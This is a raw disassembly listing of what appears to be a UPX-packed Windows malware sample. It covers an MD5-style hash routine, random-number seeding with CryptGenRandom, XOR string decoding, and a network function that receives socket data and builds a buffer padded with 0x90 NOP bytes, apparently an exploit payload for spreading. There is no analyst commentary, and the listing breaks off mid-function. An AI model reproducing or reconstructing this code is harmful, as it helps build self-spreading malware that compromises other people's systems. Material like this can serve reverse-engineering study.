mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
loc_41005C: ; DATA XREF: UPX1:off_41A8CC�o
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: UPX0:004168D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call ds:dword_417024 ; CryptAcquireContextA
push offset dword_41EBAC
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB0
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB4
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB8
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call ds:dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd ds:dword_41EBAC, eax
add eax, ebx
lock xadd ds:dword_41EBB0, eax
add eax, ecx
lock xadd ds:dword_41EBB4, eax
add eax, edx
lock xadd ds:dword_41EBB8, eax
add eax, esi
lock xadd ds:dword_41EBAC, eax
add eax, edi
lock xadd ds:dword_41EBB0, eax
add eax, ebp
lock xadd ds:dword_41EBB4, eax
add eax, esp
lock xadd ds:dword_41EBB8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd ds:dword_41EBAC, eax
lock xadd ds:dword_41EBB0, eax
lock xadd ds:dword_41EBB4, eax
lock xadd ds:dword_41EBB8, eax
add ecx, ebx
ror ebx, cl
lock xadd ds:dword_41EBB4, ebx
add ecx, ecx
ror ecx, cl
lock xadd ds:dword_41EBB0, ecx
add ecx, edx
ror edx, cl
lock xadd ds:dword_41EBAC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd ds:dword_41EBB8, edx
lock xadd ds:dword_41EBB4, ecx
lock xadd ds:dword_41EBB0, ebx
lock xadd ds:dword_41EBAC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBAC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: UPX0:004168E1�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EBC0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EBC0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, ds:byte_41EBC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, ds:byte_41EBC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: UPX1:off_41CDAE�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
